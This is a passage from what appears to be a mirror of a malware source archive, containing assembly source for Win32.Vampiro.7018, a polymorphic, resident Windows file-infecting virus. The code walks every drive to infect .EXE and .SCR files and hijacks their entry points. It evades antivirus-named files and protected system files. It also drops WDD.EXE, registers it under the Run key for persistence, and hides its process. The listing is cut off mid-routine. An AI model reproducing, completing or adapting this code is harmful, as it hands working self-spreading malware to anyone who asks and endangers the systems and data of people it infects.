mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
4044 lines
116 KiB
NASM
4044 lines
116 KiB
NASM
|
||
; Win32.Vampiro.7018
|
||
;
|
||
; + UEP
|
||
; + POLY
|
||
; + RESIDENT
|
||
; + SFC Check
|
||
; + MAZER FUCKER ALL INFECT
|
||
;
|
||
; Small period of writing. Only 2 weeks.
|
||
;
|
||
; Use :
|
||
; - [ETMS] v0.36 by b0z0/iKX [bug fixed]
|
||
; - Length-Disassembler Engine by Z0mbie
|
||
; - aPLib v0.22b by Joergen Ibsen / Jibz
|
||
; - Source of Win32.Vampiro by LordDark
|
||
; - Win32.Libertine by <NeverLoved> [SSR]
|
||
; - SFC library by GriYo
|
||
;
|
||
; and thx 2 other peoplz
|
||
;
|
||
; <x> Ivan
|
||
;
|
||
|
||
%OUT Hey man, you can't comiple it!!!
|
||
%OUT You have already compiled...
|
||
.err
|
||
|
||
.586
|
||
|
||
zcall macro api
|
||
extrn api: proc
|
||
call api
|
||
endm
|
||
|
||
CRC32_init equ 0EDB88320h
|
||
CRC32_num equ 0FFFFFFFFh
|
||
|
||
CRC32_eax macro string
|
||
db 0B8h
|
||
CRC32 string
|
||
endm
|
||
|
||
CRC32 macro string
|
||
crcReg = CRC32_num
|
||
irpc _x,<string>
|
||
ctrlByte = '&_x&' xor (crcReg and 0FFh)
|
||
crcReg = crcReg shr 8
|
||
rept 8
|
||
ctrlByte = (ctrlByte shr 1) xor (CRC32_init * (ctrlByte and 1))
|
||
endm
|
||
crcReg = crcReg xor ctrlByte
|
||
endm
|
||
dd crcReg
|
||
endm
|
||
|
||
import_beg macro kernel
|
||
db '&kernel&',0
|
||
endm
|
||
|
||
import_nam macro name
|
||
CRC32 &name&
|
||
local b
|
||
b=0
|
||
irpc a,<name>
|
||
IF b EQ 0
|
||
db '&a&'
|
||
ENDIF
|
||
b=b+1
|
||
endm
|
||
&name& dd 0
|
||
endm
|
||
|
||
import_end macro
|
||
dd 0
|
||
endm
|
||
|
||
MAX_PATH = 260
|
||
|
||
find_str struc
|
||
dwFileAttributes dd ?
|
||
ftCreationTime dq ?
|
||
ftLastAccessTime dq ?
|
||
ftLastWriteTime dq ?
|
||
nFileSizeHigh dd ?
|
||
nFileSizeLow dd ?
|
||
dwReserved0 dd ?
|
||
dwReserved1 dd ?
|
||
cFileName db MAX_PATH dup (?)
|
||
cAlternateFileName db 14 dup (?)
|
||
ends
|
||
|
||
locals __
|
||
.model flat
|
||
.code
|
||
db ?
|
||
.data
|
||
include x.inc
|
||
start proc
|
||
call get_delta
|
||
call set_seh
|
||
mov esp, [esp.8]
|
||
jmp exit
|
||
set_seh:
|
||
sub eax, eax
|
||
push 4 ptr fs:[eax]
|
||
mov 4 ptr fs:[eax], esp
|
||
lea eax, [ebp.start]
|
||
mov 4 ptr [ebp.vl_of], eax
|
||
call GetKernel32
|
||
mov 4 ptr [ebp.k32], eax
|
||
call import
|
||
push 0
|
||
call [ebp.GetModuleHandleA]
|
||
add eax, 4 ptr [ebp.host32_2]
|
||
mov 4 ptr [ebp.host32_2], eax
|
||
lea edx, [ebp.reloc_jmp]
|
||
sub eax, edx
|
||
mov 4 ptr [ebp.reloc_jmp+1-5], eax
|
||
push 0 5
|
||
lea eax, [ebp.saved]
|
||
push eax
|
||
mov eax, 4 ptr [ebp.host32_2]
|
||
push eax
|
||
call [ebp.GetCurrentProcess]
|
||
push eax
|
||
call [ebp.WriteProcessMemory]
|
||
push _vl 0
|
||
call [ebp.GlobalAlloc]
|
||
push eax
|
||
xchg eax, edi
|
||
lea esi, [ebp.start]
|
||
mov ecx, offset packed - start
|
||
lea eax, [ebp+__exit]
|
||
push eax
|
||
lea eax, [edi+__next-start]
|
||
push eax
|
||
rep movsb
|
||
lea eax, [ebp.packed]
|
||
push edi
|
||
push eax
|
||
call _aP_depack_asm
|
||
ret
|
||
__next:
|
||
call get_delta
|
||
push eax eax esp
|
||
call [ebp.GetSystemTimeAsFileTime]
|
||
pop eax
|
||
pop edx
|
||
add eax, edx
|
||
mov [ebp.seed], eax
|
||
cmp 1 ptr [ebp.is_drop], 1
|
||
mov 1 ptr [ebp.is_drop], 0
|
||
jz __k
|
||
lea eax, [ebp.Vampiro]
|
||
push eax
|
||
call [ebp.GlobalFindAtomA]
|
||
movzx eax, ax
|
||
test eax, eax
|
||
jnz __x
|
||
call create_dropper
|
||
__x:
|
||
ret
|
||
__k:
|
||
lea eax, [ebp.Vampiro]
|
||
push eax
|
||
call [ebp.GlobalAddAtomA]
|
||
call hide
|
||
push 10000
|
||
call [ebp.Sleep]
|
||
call infect_all
|
||
lea eax, [ebp.Vampiro]
|
||
push eax
|
||
call [ebp.GlobalFindAtomA]
|
||
movzx esi, ax
|
||
push 20
|
||
pop ecx
|
||
__delete:
|
||
push esi
|
||
call [ebp.GlobalDeleteAtom]
|
||
test eax, eax
|
||
loopne __delete
|
||
ret
|
||
__exit:
|
||
call [ebp.GlobalFree]
|
||
exit:
|
||
pop 4 ptr fs:[0]
|
||
pop eax
|
||
popad
|
||
popf
|
||
db 0E9H
|
||
dd 0
|
||
reloc_jmp:
|
||
endp
|
||
|
||
_aP_depack_asm:
|
||
push ebp
|
||
mov ebp, esp
|
||
pushad
|
||
push ebp
|
||
|
||
mov esi, [ebp + 8] ; C calling convention
|
||
mov edi, [ebp + 12]
|
||
|
||
cld
|
||
mov dl, 80h
|
||
|
||
literal:
|
||
movsb
|
||
nexttag:
|
||
call getbit
|
||
jnc literal
|
||
|
||
xor ecx, ecx
|
||
call getbit
|
||
jnc codepair
|
||
xor eax, eax
|
||
call getbit
|
||
jnc shortmatch
|
||
mov al, 10h
|
||
getmorebits:
|
||
call getbit
|
||
adc al, al
|
||
jnc getmorebits
|
||
jnz domatch_with_inc
|
||
stosb
|
||
jmp short nexttag
|
||
codepair:
|
||
call getgamma_no_ecx
|
||
dec ecx
|
||
loop normalcodepair
|
||
mov eax,ebp
|
||
call getgamma
|
||
jmp short domatch
|
||
|
||
shortmatch:
|
||
lodsb
|
||
shr eax, 1
|
||
jz donedepacking
|
||
adc ecx, 2
|
||
mov ebp, eax
|
||
jmp short domatch
|
||
|
||
normalcodepair:
|
||
xchg eax, ecx
|
||
dec eax
|
||
shl eax, 8
|
||
lodsb
|
||
mov ebp, eax
|
||
call getgamma
|
||
cmp eax, 32000
|
||
jae domatch_with_2inc
|
||
cmp eax, 1280
|
||
jae domatch_with_inc
|
||
cmp eax, 7fh
|
||
ja domatch
|
||
|
||
domatch_with_2inc:
|
||
inc ecx
|
||
|
||
domatch_with_inc:
|
||
inc ecx
|
||
domatch:
|
||
push esi
|
||
mov esi, edi
|
||
sub esi, eax
|
||
rep movsb
|
||
pop esi
|
||
jmp short nexttag
|
||
|
||
getbit:
|
||
add dl, dl
|
||
jnz stillbitsleft
|
||
mov dl, [esi]
|
||
inc esi
|
||
adc dl, dl
|
||
stillbitsleft:
|
||
ret
|
||
|
||
getgamma:
|
||
xor ecx, ecx
|
||
getgamma_no_ecx:
|
||
inc ecx
|
||
getgammaloop:
|
||
call getbit
|
||
adc ecx, ecx
|
||
call getbit
|
||
jc getgammaloop
|
||
ret
|
||
|
||
donedepacking:
|
||
pop ebp
|
||
sub edi, [ebp + 12]
|
||
mov [ebp - 4], edi ; return unpacked length in eax
|
||
|
||
popad
|
||
pop ebp
|
||
ret 8
|
||
|
||
|
||
GetKernel32:
|
||
call __set_seh
|
||
sub eax, eax
|
||
mov esp, [esp.8]
|
||
dec eax
|
||
jmp __exit
|
||
__set_seh:
|
||
sub eax, eax
|
||
push 4 ptr fs:[eax]
|
||
mov 4 ptr fs:[eax], esp
|
||
mov edx, 4 ptr fs:[0]; get first esp fault
|
||
__3:
|
||
mov eax, [edx+4] ; offset fault
|
||
mov edx, [edx] ; next fault ofz
|
||
sub ax, ax
|
||
__2:
|
||
cmp 1 ptr [eax], 'M'
|
||
jz __1
|
||
sub eax, 10000h
|
||
jmp __2
|
||
__1:
|
||
movzx esi, 2 ptr [eax+3Ch]
|
||
add esi, eax
|
||
cmp 1 ptr [esi], 'P'
|
||
jnz __3
|
||
mov esi, [esi+78h] ; no export
|
||
test esi, esi
|
||
jz __3
|
||
mov esi, [esi+eax+0Ch]
|
||
cmp 4 ptr [esi+eax], 'NREK'
|
||
jnz __3
|
||
__exit:
|
||
pop 4 ptr fs:[0]
|
||
pop edx
|
||
ret
|
||
|
||
import_table:
|
||
import_beg kernel32
|
||
import_nam _lopen
|
||
import_nam _lcreat
|
||
import_nam ReadFile
|
||
import_nam WriteFile
|
||
import_nam CloseHandle
|
||
import_nam CreateProcessA
|
||
import_nam SetFileAttributesA
|
||
import_nam GetFileAttributesA
|
||
import_nam GetFileTime
|
||
import_nam GetProcAddress
|
||
import_nam SetFileTime
|
||
import_nam SetEndOfFile
|
||
import_nam GetFileSize
|
||
import_nam GetCurrentProcessId
|
||
import_nam SetFilePointer
|
||
import_nam WriteProcessMemory
|
||
import_nam GetCurrentProcess
|
||
import_nam GlobalAlloc
|
||
import_nam GlobalFree
|
||
import_nam FindClose
|
||
import_nam FindFirstFileA
|
||
import_nam FindNextFileA
|
||
import_nam FreeLibrary
|
||
import_nam SetCurrentDirectoryA
|
||
import_nam GetDriveTypeA
|
||
import_nam GetTempPathA
|
||
import_nam GetSystemDirectoryA
|
||
import_nam SetErrorMode
|
||
import_nam Sleep
|
||
import_nam GlobalFindAtomA
|
||
import_nam GlobalAddAtomA
|
||
import_nam GlobalDeleteAtom
|
||
import_nam GetSystemTimeAsFileTime
|
||
import_nam GetCurrentDirectoryA
|
||
import_nam MultiByteToWideChar
|
||
import_end
|
||
import_beg advapi32.dll
|
||
import_nam RegSetValueExA
|
||
import_nam RegCreateKeyExA
|
||
import_nam RegCloseKey
|
||
import_end
|
||
import_end
|
||
|
||
get_delta proc
|
||
call $+5
|
||
delta:
|
||
cld
|
||
pop ebp
|
||
sub ebp, offset delta
|
||
ret
|
||
endp
|
||
|
||
get_proc proc
|
||
push ebp
|
||
; in:
|
||
; eax - CRC32
|
||
; ebx - DLL offset
|
||
; dl - first char
|
||
; out:
|
||
; eax - API address
|
||
; [ecx+ebx] - offset API address in table
|
||
; ebx - offset DLL
|
||
movzx edi, 2 ptr [ebx+3Ch]
|
||
mov edi, [edi+78h+ebx]
|
||
mov ecx, [edi+18h+ebx]
|
||
mov esi, [edi+20h+ebx]
|
||
__1:
|
||
mov ebp, [esi+ebx]
|
||
add ebp, ebx
|
||
cmp 1 ptr [ebp], dl
|
||
jnz __2
|
||
push ebx ecx
|
||
; use ebx, ecx
|
||
; ebp - offset to name'z
|
||
xor ebx, ebx
|
||
dec ebx
|
||
__5:
|
||
xor bl, 1 ptr [ebp]
|
||
inc ebp
|
||
mov cl, 7
|
||
__3:
|
||
shr ebx, 1
|
||
jnc __4
|
||
xor ebx, CRC32_init
|
||
__4:
|
||
dec cl
|
||
jns __3
|
||
cmp 1 ptr [ebp], 0
|
||
jnz __5
|
||
cmp eax, ebx
|
||
pop ecx ebx
|
||
jz __6
|
||
__2:
|
||
add esi, 4
|
||
loop __1
|
||
__6:
|
||
sub ecx, [edi+18h+ebx]
|
||
neg ecx
|
||
add ecx, ecx
|
||
add ecx, [edi+24h+ebx]
|
||
add ecx, ebx
|
||
movzx ecx, 2 ptr [ecx]
|
||
shl ecx, 2
|
||
add ecx, [edi+1Ch+ebx]
|
||
mov eax, [ecx+ebx]
|
||
add eax, ebx
|
||
pop ebp
|
||
ret
|
||
endp
|
||
|
||
import proc
|
||
mov ebx, [ebp.k32]
|
||
CRC32_eax GetModuleHandleA
|
||
mov dl, 'G'
|
||
call get_proc
|
||
mov [ebp.GetModuleHandleA], eax
|
||
CRC32_eax LoadLibraryA
|
||
mov dl, 'L'
|
||
call get_proc
|
||
mov [ebp.LoadLibraryA], eax
|
||
lea esi, [ebp.import_table]
|
||
__1:
|
||
push esi
|
||
call [ebp.GetModuleHandleA]
|
||
test eax, eax
|
||
jnz __2
|
||
; if library not load ...
|
||
push esi
|
||
call [ebp.LoadLibraryA]
|
||
__2:
|
||
xchg eax, ebx
|
||
__3:
|
||
lodsb
|
||
test al, al
|
||
jnz __3
|
||
__4:
|
||
lodsd
|
||
test eax, eax
|
||
jz __5
|
||
mov dl, [esi]
|
||
inc esi
|
||
push esi
|
||
call get_proc
|
||
pop edi
|
||
stosd
|
||
mov esi, edi
|
||
jmp __4
|
||
__5:
|
||
cmp [esi], eax
|
||
jnz __1
|
||
ret
|
||
endp
|
||
|
||
GetModuleHandleA dd 0
|
||
LoadLibraryA dd 0
|
||
k32 dd 0BFF70000h
|
||
|
||
extra_data:
|
||
|
||
is_drop db 0
|
||
|
||
saved:
|
||
ret
|
||
db 4 dup (90h)
|
||
|
||
host32_2:
|
||
dd offset host32-00400000h
|
||
|
||
extra_len equ offset $-extra_data
|
||
|
||
vl_sz dd 7016+2
|
||
vl_of dd 0
|
||
|
||
org $-2
|
||
db '^^'
|
||
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
packed:
|
||
|
||
exec:
|
||
sub esp, 16
|
||
mov ecx, esp
|
||
sub esp, 64
|
||
mov ebx, esp
|
||
mov 1 ptr [ebx], 64
|
||
push ecx ebx 0 0 0 0 0 0 0 eax
|
||
call [ebp.CreateProcessA]
|
||
add esp, 16+64
|
||
ret
|
||
|
||
|
||
host32_1:
|
||
dd 0
|
||
|
||
|
||
|
||
Vampiro equ this byte
|
||
name_atom db 'Vampiro',0
|
||
|
||
|
||
|
||
sfc proc
|
||
; call log_it
|
||
mov esi, edx
|
||
push 'LLD'
|
||
push '.CFS'
|
||
push esp
|
||
call [ebp.LoadLibraryA]
|
||
add esp, 8
|
||
test eax, eax
|
||
jz __1
|
||
push eax
|
||
sub esp, 100h+4
|
||
push esp 100h+4
|
||
call [ebp.GetCurrentDirectoryA]
|
||
lea edi, [esp+eax]
|
||
mov al, '\'
|
||
cmp 1 ptr [edi-1], al
|
||
jz __2
|
||
stosb
|
||
__2: movsb
|
||
cmp 1 ptr [esi-1], 0
|
||
jnz __2
|
||
mov eax, esp
|
||
sub esp, 200h+8
|
||
mov edx, esp
|
||
push 100h+4
|
||
push edx
|
||
push -1
|
||
push eax
|
||
push 0
|
||
push 0
|
||
call [ebp.MultiByteToWideChar]
|
||
call __3
|
||
db 'SfcIsFileProtected',0
|
||
__3: push 4 ptr [esp+4+200h+100h+4+8]
|
||
call [ebp.GetProcAddress]
|
||
test eax, eax
|
||
jz __4
|
||
push esp 0
|
||
call eax
|
||
__4: xchg esi, eax
|
||
add esp, 200h+100h+8+4
|
||
call [ebp.FreeLibrary]
|
||
xchg esi, eax
|
||
__1: ret
|
||
endp
|
||
|
||
key db 'Software\Microsoft\Windows\CurrentVersion\Run',0
|
||
|
||
create_dropper proc
|
||
sub esp, 100h
|
||
mov eax, esp
|
||
push 100h
|
||
push eax
|
||
call [ebp.GetSystemDirectoryA] ; D:\WINDOWS\SYSTEM32
|
||
mov 1 ptr [esp+eax], '\'
|
||
mov 4 ptr [esp+eax+1], '.DDW'
|
||
mov 4 ptr [esp+eax+5], 'EXE'
|
||
mov edx, esp
|
||
call drop_gen
|
||
cmp eax, -1
|
||
jz __3x
|
||
mov edx, esp
|
||
mov 1 ptr [ebp.is_drop], 1
|
||
call infect_it
|
||
mov eax, esp
|
||
call exec
|
||
mov esi, esp
|
||
push eax
|
||
push eax
|
||
mov edi, esp
|
||
lea edx, [edi.4]
|
||
sub eax, eax
|
||
push edx
|
||
push edi
|
||
push eax
|
||
push 0f003fh
|
||
push eax
|
||
push eax
|
||
push eax
|
||
lea eax, [ebp+key]
|
||
push eax
|
||
push 80000002h
|
||
call [ebp+RegCreateKeyExA]
|
||
test eax, eax
|
||
jnz @@x
|
||
sub ecx, ecx
|
||
mov edx, esi
|
||
__x:
|
||
mov al, [edx]
|
||
inc edx
|
||
inc ecx
|
||
test al, al
|
||
jnz __x
|
||
dec ecx
|
||
push ecx
|
||
push esi
|
||
push 1
|
||
push 0
|
||
lea eax, [ebp+name_atom]
|
||
push eax
|
||
push 4 ptr [edi]
|
||
call [ebp+RegSetValueExA]
|
||
push 4 ptr [edi]
|
||
call [ebp+RegCloseKey]
|
||
@@x:
|
||
add esp, 8
|
||
jmp __4
|
||
__3x:
|
||
push esp
|
||
push 100h
|
||
call [ebp.GetTempPathA] ; C:\WINDOWS\TEMP\
|
||
mov 4 ptr [esp+eax], '.DDW'
|
||
mov 4 ptr [esp+eax+4], 'EXE'
|
||
mov edx, esp
|
||
call drop_gen
|
||
cmp eax, -1
|
||
jz __4
|
||
mov edx, esp
|
||
mov 1 ptr [ebp.is_drop], 1
|
||
call infect_it
|
||
mov eax, esp
|
||
call exec
|
||
__4:add esp, 100h
|
||
ret
|
||
endp
|
||
|
||
infect_all proc
|
||
push '\:A'
|
||
__2:push esp
|
||
call [ebp.GetDriveTypeA]
|
||
cmp eax, 2
|
||
jbe __1
|
||
cmp al, 5
|
||
jz __1
|
||
push esp
|
||
call [ebp.SetCurrentDirectoryA]
|
||
mov esi, esp
|
||
sub esp, ((size find_str) and (not 11b))+4
|
||
mov edi, esp
|
||
call recsearch
|
||
add esp, ((size find_str) and (not 11b))+4
|
||
__1:inc 1 ptr [esp]
|
||
cmp 1 ptr [esp], 'Z'+1
|
||
jnz __2
|
||
pop eax
|
||
ret
|
||
endp
|
||
|
||
recsearch:
|
||
push '*.*'
|
||
mov eax, esp
|
||
push edi eax
|
||
call [ebp.FindFirstFileA]
|
||
pop edx
|
||
cmp eax, -1
|
||
jz __1
|
||
xchg eax, ebx
|
||
__2:mov eax, esi
|
||
sub eax, esp
|
||
cmp eax, 0C00h
|
||
ja __4
|
||
test 1 ptr [edi.dwFileAttributes], 10h
|
||
jz __3 ; JZ - not DIR
|
||
cmp 1 ptr [edi.cFileName], '.'
|
||
jz __4
|
||
lea eax, [edi.cFileName]
|
||
push eax
|
||
call [ebp.SetCurrentDirectoryA]
|
||
push ebx
|
||
call recsearch
|
||
push '..'
|
||
push esp
|
||
call [ebp.SetCurrentDirectoryA]
|
||
pop eax
|
||
pop ebx
|
||
jmp __4
|
||
__3:pusha
|
||
lea edx, [edi.cFileName]
|
||
mov edi, edx
|
||
push -1
|
||
pop ecx
|
||
sub al, al
|
||
repne scasb
|
||
mov eax, [edi-4]
|
||
and eax, 0DFDFDFDFh
|
||
cmp eax, 'EXE' and 0DFDFDFDFh ; .EXE
|
||
jz __7
|
||
cmp eax, 'RCS' and 0DFDFDFDFh ; .SCR
|
||
jnz __6
|
||
__7:
|
||
call infect_it
|
||
push 2000
|
||
call [ebp.Sleep]
|
||
__6:
|
||
popa
|
||
__4:
|
||
push edi
|
||
push ebx
|
||
push 500
|
||
call [ebp.Sleep]
|
||
call [ebp.FindNextFileA]
|
||
test eax, eax
|
||
jnz __2
|
||
push ebx
|
||
call [ebp.FindClose]
|
||
__1:ret
|
||
|
||
hide proc
|
||
|
||
SEM_FAILCRITICALERRORS = 00001h
|
||
SEM_NOGPFAULTERRORBOX = 00002h
|
||
SEM_NOALIGNMENTFAULTEXCEPT = 00004h
|
||
SEM_NOOPENFILEERRORBOX = 08000h
|
||
|
||
push SEM_FAILCRITICALERRORS or SEM_NOGPFAULTERRORBOX or SEM_NOOPENFILEERRORBOX
|
||
call [ebp.SetErrorMode]
|
||
call __1
|
||
db 'RegisterServiceProcess',0
|
||
__1:
|
||
push 4 ptr [ebp.k32]
|
||
call [ebp.GetProcAddress]
|
||
test eax, eax
|
||
jz __2
|
||
xchg eax, ebx
|
||
call [ebp.GetCurrentProcessId]
|
||
push 1
|
||
push eax
|
||
call ebx
|
||
__2:
|
||
ret
|
||
endp
|
||
|
||
; <20><> <20>ண<EFBFBD><E0AEA3><EFBFBD>:
|
||
; - _A
|
||
; - VI
|
||
; - UN
|
||
; - SC
|
||
; - NO
|
||
; - AV
|
||
|
||
|
||
infect_it proc
|
||
call __set_seh
|
||
mov esp, [esp.8]
|
||
jmp __1
|
||
__set_seh:
|
||
cld
|
||
sub eax, eax
|
||
push 4 ptr fs:[eax]
|
||
mov 4 ptr fs:[eax], esp
|
||
mov ax, [edx]
|
||
and eax, 0DFDFh
|
||
cmp eax, 'A_' and 0DFDFh
|
||
jz __1
|
||
cmp eax, 'IV' and 0DFDFh
|
||
jz __1
|
||
cmp eax, 'NU' and 0DFDFh
|
||
jz __1
|
||
cmp eax, 'CS' and 0DFDFh
|
||
jz __1
|
||
cmp eax, 'ON' and 0DFDFh
|
||
jz __1
|
||
cmp eax, 'VA' and 0DFDFh
|
||
jz __1
|
||
push edx
|
||
call sfc ; EAX == 0 -> OK
|
||
pop edx
|
||
test eax, eax
|
||
jnz __1
|
||
call infect
|
||
__1:
|
||
pop 4 ptr fs:[0]
|
||
pop eax
|
||
ret
|
||
endp
|
||
|
||
infect proc
|
||
; edx - name
|
||
call fattrg
|
||
cmp eax, -1
|
||
jnz __1
|
||
__2:
|
||
ret
|
||
__1: sub ecx, ecx
|
||
xchg eax, ecx
|
||
call fattrs
|
||
test eax, eax
|
||
jz __2
|
||
push 2
|
||
pop eax
|
||
call open
|
||
cmp eax, -1
|
||
xchg eax, ebx
|
||
jz __2
|
||
push ecx
|
||
sub esp, 3*8
|
||
mov esi, esp
|
||
push edx
|
||
call gettime
|
||
lea edx, [ebp.buffer]
|
||
push 3Ch+4
|
||
pop ecx
|
||
call read
|
||
jc __close
|
||
cmp 2 ptr [edx], 'ZM'
|
||
jnz __close
|
||
cmp 2 ptr [edx.18h], 40h
|
||
jb __close
|
||
push edx
|
||
movzx edx, 2 ptr [edx.3Ch]
|
||
mov [ebp.word3C], edx
|
||
call seek
|
||
pop edx
|
||
mov ecx, 0F8h + (28h*8)
|
||
call read
|
||
jc __close
|
||
cmp 2 ptr [edx], 'EP'
|
||
jnz __close
|
||
; dll ? if i process dll then skip
|
||
; this test
|
||
test 2 ptr [edx.16h], 2000h
|
||
jnz __close
|
||
; can run ?
|
||
test 2 ptr [edx.16h], 0002h
|
||
jz __close
|
||
; good image base ?
|
||
cmp 4 ptr [edx.160], 0
|
||
jz __yeeah
|
||
cmp 4 ptr [edx.52], 00400000h
|
||
jnz __close
|
||
__yeeah:
|
||
; intel x86 processor ?
|
||
mov al, [edx.4]
|
||
and al, 11110000b
|
||
cmp al, 40h
|
||
jnz __close
|
||
; 2..8 sections ?
|
||
cmp 2 ptr [edx.06h], 8
|
||
ja __close
|
||
cmp 2 ptr [edx.06h], 2
|
||
jb __close
|
||
; it's already ?
|
||
test 1 ptr [edx.44h], 16
|
||
jnz __close
|
||
or 1 ptr [edx.44h], 16
|
||
; save EIP
|
||
mov eax, [edx.28h]
|
||
mov 4 ptr [ebp.host32_1], eax
|
||
mov eax, [edx+52]
|
||
mov [ebp.save_me], eax
|
||
mov eax, 1000h
|
||
cmp [edx.38h], eax
|
||
ja __close
|
||
cmp [edx.3Ch], eax
|
||
ja __close
|
||
lea edi, [ebp.buff]
|
||
mov ecx, (len_buff)/4
|
||
sub eax, eax
|
||
rep stosd
|
||
mov 4 ptr [edx.58h], eax
|
||
call process_it
|
||
__close:
|
||
pop edx
|
||
mov esi, esp
|
||
call settime
|
||
add esp, 3*8
|
||
call close
|
||
pop eax
|
||
call fattrs
|
||
ret
|
||
endp
|
||
|
||
process_it proc
|
||
movzx eax, 2 ptr [edx.14h]
|
||
cmp al, 0E0h
|
||
jnz __1
|
||
lea edi, [eax+18h+edx]
|
||
movzx ecx, 2 ptr [edx.6]
|
||
__loop:
|
||
; check file
|
||
mov esi, [edx.28h]
|
||
cmp 4 ptr [edi.0Ch], esi
|
||
ja __4
|
||
push eax
|
||
mov eax, 4 ptr [edi.0Ch]
|
||
add eax, 4 ptr [edi.10h]
|
||
cmp esi, eax
|
||
pop eax
|
||
jb __5
|
||
__4: add edi, 28h
|
||
loop __loop
|
||
jmp __1
|
||
__5: test 1 ptr [edi.27h], 80h
|
||
jnz __1
|
||
mov esi, [edi.12]
|
||
add esi, [edi.16]
|
||
sub esi, [edx.40]
|
||
mov 4 ptr [ebp.__rule_me], size_UEP-4
|
||
cmp esi, size_UEP-4
|
||
ja __b
|
||
sub esi, 4
|
||
mov 4 ptr [ebp.__rule_me], esi
|
||
__b: ; read from IP some bytes
|
||
; for UEP
|
||
lea esi, [eax+18h+edx]
|
||
push edx
|
||
mov eax, [edx.028h]
|
||
sub eax, [edi.0Ch]
|
||
add eax, [edi.14h]
|
||
mov 4 ptr [ebp.forUEP], eax
|
||
xchg eax, edx
|
||
call seek
|
||
lea edx, [ebp.UEP]
|
||
mov ecx, 4 ptr [ebp.__rule_me]
|
||
add ecx, 4
|
||
call read
|
||
pop edx
|
||
jc __1
|
||
movzx eax, 2 ptr [edx.6]
|
||
dec eax
|
||
imul eax, eax, 28h
|
||
add esi, eax
|
||
mov edi, [esi.14h]
|
||
add edi, [esi.10h]
|
||
call fsize
|
||
cmp eax, edi
|
||
jz __2
|
||
push edx
|
||
mov edx, edi
|
||
call seek
|
||
push eax eax
|
||
mov edx, esp
|
||
push 8
|
||
pop ecx
|
||
call read
|
||
pop eax
|
||
pop ecx
|
||
cmp eax, 1
|
||
jnz __not_3
|
||
cmp ecx, 1234567h
|
||
org $-4
|
||
db 10h,1,0,0
|
||
jz __3
|
||
__not_3:
|
||
and eax, 1234567h
|
||
org $-4
|
||
db 0FFh, 0FFh, 0F0h, 0
|
||
cmp eax, 1234567h
|
||
org $-4
|
||
db 'N','B',30h,0
|
||
jz __3
|
||
call fsize
|
||
sub eax, edi
|
||
cmp eax, 100h ; 256 bytes only
|
||
; if yes then skip it ;)
|
||
jb __3
|
||
pop eax
|
||
jmp __1
|
||
__3: mov edx, edi
|
||
call seek
|
||
call truncate
|
||
pop edx
|
||
__2: mov [ebp.flen], edi
|
||
mov eax, [edx.160]
|
||
test eax, eax
|
||
jz __ok
|
||
mov edi, [esi.12]
|
||
cmp eax, edi
|
||
jb __1
|
||
add edi, [esi.16]
|
||
cmp eax, edi
|
||
ja __1
|
||
dec 2 ptr [edx.6]
|
||
push edx
|
||
push 28h
|
||
pop ecx
|
||
sub eax, eax
|
||
mov 4 ptr [edx.160], eax
|
||
mov 4 ptr [edx.164], eax
|
||
mov edx, [esi.20]
|
||
mov edi, esi
|
||
rep stosb
|
||
call seek
|
||
mov [ebp.flen], eax
|
||
call truncate
|
||
mov edx, [ebp.word3C]
|
||
call seek
|
||
lea edx, [ebp.buffer]
|
||
mov ecx, 0F8h + (28h*8)
|
||
call write
|
||
pop edx
|
||
sub esi, 28h
|
||
__ok: cmp 4 ptr [esi.1], 'zniw' ; winz
|
||
jz __1
|
||
or 1 ptr [esi.24h+3], 0C0h
|
||
pusha
|
||
lea eax, [ebp.tbl]
|
||
push eax
|
||
call disasm_init
|
||
add esp, 4
|
||
push 1234567h
|
||
__rule_me equ 2 ptr $-4
|
||
pop ecx
|
||
lea edi, [ebp.UEP]
|
||
sub ebx, ebx
|
||
__find:
|
||
inc ebx
|
||
cmp ebx, (size_UEP-4) / 2
|
||
ja __error
|
||
push edi
|
||
lea eax, [ebp.tbl]
|
||
push eax
|
||
call disasm_main
|
||
add esp, 8
|
||
cmp eax, -1
|
||
jnz __no_error
|
||
__error:
|
||
lea edi, [ebp.UEP]
|
||
jmp __found
|
||
__no_error:
|
||
sub ecx, eax
|
||
jc __error
|
||
lea edx, [ebp.UEP]
|
||
cmp 1 ptr [edi], 0EBh
|
||
jnz __no_EB
|
||
movsx eax, 1 ptr [edi.1]
|
||
push edi
|
||
inc edi
|
||
inc edi
|
||
add edi, eax
|
||
pop eax
|
||
cmp edi, edx
|
||
jb __error
|
||
add edx, 4 ptr [ebp.__rule_me]
|
||
cmp edi, edx
|
||
ja __error
|
||
push edi
|
||
xchg eax, edi
|
||
sub eax, edi
|
||
sub ecx, eax
|
||
pop edi
|
||
jmp __find
|
||
__no_EB:
|
||
cmp 1 ptr [edi], 0E9H
|
||
jz __found
|
||
mov edx, 4 ptr [ebp.__rule_me]
|
||
sub edx, 128
|
||
cmp ecx, edx
|
||
ja __no_E8
|
||
cmp 1 ptr [edi], 0E8h
|
||
jz __found
|
||
__no_E8:
|
||
add edi, eax
|
||
jmp __find
|
||
__found:
|
||
lea ecx, [ebp.UEP]
|
||
mov eax, edi
|
||
sub eax, ecx
|
||
add eax, 4 ptr [ebp.host32_1]
|
||
mov 4 ptr [ebp.host32_2], eax
|
||
mov eax, [edi]
|
||
mov 4 ptr [ebp.saved], eax
|
||
mov al, [edi.4]
|
||
mov 1 ptr [ebp.saved+4], al
|
||
mov al, 0E9h
|
||
stosb
|
||
lea edx, [ebp.UEP]
|
||
mov eax, edi
|
||
dec eax
|
||
sub eax, edx
|
||
neg eax
|
||
add eax, 4 ptr [esi.10h]
|
||
add eax, 4 ptr [esi.0Ch]
|
||
sub eax, 4 ptr [ebp.host32_1]
|
||
sub eax, 5
|
||
stosd
|
||
;;;;;; FUCK
|
||
lea esi, [ebp.extra_data]
|
||
push extra_len
|
||
pop ecx
|
||
mov edi, [ebp.vl_of]
|
||
add edi, offset extra_data - start
|
||
rep movsb
|
||
;;;;;;
|
||
popa
|
||
pusha
|
||
mov esi, [ebp.vl_of]
|
||
lea edi, [ebp.buff+2]
|
||
mov ecx, [ebp.vl_sz]
|
||
; rep movsb
|
||
call engine_serv
|
||
; mov ecx, [ebp.vl_sz]
|
||
; lea edi, [ebp.buff+2]
|
||
mov _EAX, ecx
|
||
mov _EDI, edi
|
||
popa
|
||
dec edi
|
||
dec edi
|
||
mov 2 ptr [edi], 609Ch
|
||
inc eax
|
||
inc eax
